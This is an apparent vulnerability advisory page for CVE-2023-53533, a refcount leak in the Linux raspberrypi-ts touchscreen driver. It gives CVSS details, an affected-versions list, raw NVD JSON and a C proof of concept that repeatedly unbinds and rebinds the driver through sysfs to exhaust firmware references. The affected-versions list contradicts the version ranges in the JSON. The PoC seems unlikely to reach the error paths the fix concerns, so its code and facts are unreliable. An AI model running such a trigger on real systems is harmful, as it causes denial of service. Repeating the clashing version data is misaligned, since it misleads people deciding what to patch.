Security Vulnerability Report
CVE-2023-53533 CVSS 5.5 MEDIUM

CVE-2023-53533

Published: 2025-10-04 16:15:48
Last Modified: 2026-03-25 00:37:54
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

Input: raspberrypi-ts - fix refcount leak in rpi_ts_probe

rpi_firmware_get() takes a reference; we need to release it in error paths as well. Use the devm_rpi_firmware_get() helper to handle the resources. Also remove the existing rpi_firmware_put().

CVSS Details

CVSS Score: 5.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
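Linux Kernel < 6.1.63 (version containing fix commit 7acad58049ac)
Linux Kernel < 6.5.12 (version containing fix commit 5bca3688bdbc)
Linux Kernel < 6.6.2 (version containing fix commit 36d087e49dab)
All versions in the Linux kernel stable branches to which the reference-count fix has not been applied
All Raspberry Pi Linux distributions that use the raspberrypi-ts driver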

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
/*
 * CVE-2023-53533 PoC
 * Reference count leak in raspberrypi-ts driver rpi_ts_probe()
 *
 * This PoC demonstrates how to trigger the reference count leak
 * by repeatedly causing the rpi_ts_probe function to execute
 * without proper cleanup of rpi_firmware_get() reference.
 *
 * Compile: gcc -o poc poc.c
 * Run: sudo ./poc [iterations]
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <errno.h>
#include <sys/stat.h>

#define DRIVER_PATH "/sys/bus/platform/drivers/raspberrypi-ts"
#define DEVICE_NAME "1-0041"
#define DEFAULT_ITERATIONS 100

/* Trigger driver bind/unbind operation via sysfs */
int trigger_driver_action(const char *action)
{
    char path[512];
    int fd, ret;

    snprintf(path, sizeof(path), "%s/%s", DRIVER_PATH, action);
    fd = open(path, O_WRONLY);
    if (fd < 0) {
        fprintf(stderr, "[-] Failed to open %s: %s\n", path, strerror(errno));
        return -1;
    }

    ret = write(fd, DEVICE_NAME, strlen(DEVICE_NAME));
    close(fd);
    if (ret < 0) {
        fprintf(stderr, "[-] Failed to write to %s: %s\n", path, strerror(errno));
        return -1;
    }
    return 0;
}

/* Check if the driver is loaded */
int check_driver_available(void)
{
    struct stat st;

    if (stat(DRIVER_PATH, &st) != 0) {
        return 0;
    }
    return 1;
}

int main(int argc, char *argv[])
{
    int i, iterations = DEFAULT_ITERATIONS;

    if (argc > 1) {
        iterations = atoi(argv[1]);
        if (iterations <= 0) {
            fprintf(stderr, "[-] Invalid iteration count\n");
            return 1;
        }
    }

    printf("[*] CVE-2023-53533 PoC - Reference Count Leak\n");
    printf("[*] Target: raspberrypi-ts driver\n\n");

    if (!check_driver_available()) {
        fprintf(stderr, "[-] Driver path not found: %s\n", DRIVER_PATH);
        fprintf(stderr, "[-] This PoC requires a Raspberry Pi with raspberrypi-ts driver\n");
        fprintf(stderr, "[-] Try: sudo modprobe raspberrypi-ts\n");
        return 1;
    }

    printf("[*] Triggering %d probe iterations to leak firmware references...\n\n", iterations);

    for (i = 0; i < iterations; i++) {
        /* Unbind the device to allow re-probe */
        if (trigger_driver_action("unbind") == 0) {
            usleep(10000); /* 10ms delay */
        }

        /* Rebind to trigger rpi_ts_probe() */
        trigger_driver_action("bind");
        usleep(10000);

        if ((i + 1) % 10 == 0) {
            printf("[+] Iteration %d/%d completed\n", i + 1, iterations);
        }
    }

    printf("\n[*] PoC execution completed\n");
    printf("[*] Check kernel logs (dmesg) for firmware reference warnings\n");
    printf("[*] Monitor /sys/kernel/debug/rpi_firmware/info for reference count\n");
    return 0;
}

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2023-53533", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-04T16:15:48.217", "lastModified": "2026-03-25T00:37:53.760", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nInput: raspberrypi-ts - fix refcount leak in rpi_ts_probe\n\nrpi_firmware_get() take reference, we need to release it in error paths\nas well. Use devm_rpi_firmware_get() helper to handling the resources.\nAlso remove the existing rpi_firmware_put()."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-Other"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.0", "versionEndExcluding": "5.4.243", "matchCriteriaId": "1B689982-DA6B-4FA7-8C4E-28584A673F6C"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.5", "versionEndExcluding": "5.10.180", "matchCriteriaId": "78422AC3-CC89-479E-B4BC-62381D8F3564"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.11", "versionEndExcluding": "5.15.111", "matchCriteriaId": "2B9DD776-7F17-4F72-B94F-54BFCBC692DD"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", 
"versionStartIncluding": "5.16", "versionEndExcluding": "6.1.28", "matchCriteriaId": "08F855F4-7188-4EE1-BD79-D4B6C7E2EF54"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.2.15", "matchCriteriaId": "3844A90B-940D-46C3-8D7B-9FF63F1AFC2F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.3", "versionEndExcluding": "6.3.2", "matchCriteriaId": "38F6F330-91A0-4675-8B90-6F950471A7CC"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/0d6a5c9489c8a3d434e685066119c4333476dccd", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/1dfa3c9dd27bdc347733d06e980395768520bc3e", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/36d087e49dabd28d2c13a7532dac72d625ce69fb", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/5bca3688bdbc3b58a2894b8671a8e2378efe28bd", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/7acad58049acc6ac148e8b613a6eceeca4bcb4a7", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/9216aa5cfd86809a2681be3683cd9ac30432de0c", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/9dbbe9db224c23a60dc7b1e00c701be93328c873", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}